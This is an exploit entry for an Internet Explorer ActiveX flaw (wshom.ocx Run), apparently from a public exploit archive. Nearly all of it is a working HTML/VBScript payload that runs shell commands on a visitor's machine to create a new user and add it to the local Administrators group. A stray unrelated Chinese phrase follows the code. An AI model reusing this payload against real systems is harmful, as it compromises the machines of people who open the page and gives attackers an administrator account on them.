# Exploit Title: IE wshom.ocx (Run) ActiveX Remote Code Execution ( add admin user) # Date: 22/01/2010 # Author: Stack # Version: ALL # Tested on: winsp2 <html> </font></b></p> <p> <object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='target' ></object> <script language='vbscript'> arg1="cmd /c net user username password /add && net localgroup Administrateurs username /add" target.run arg1 </script></p>
体验盒子
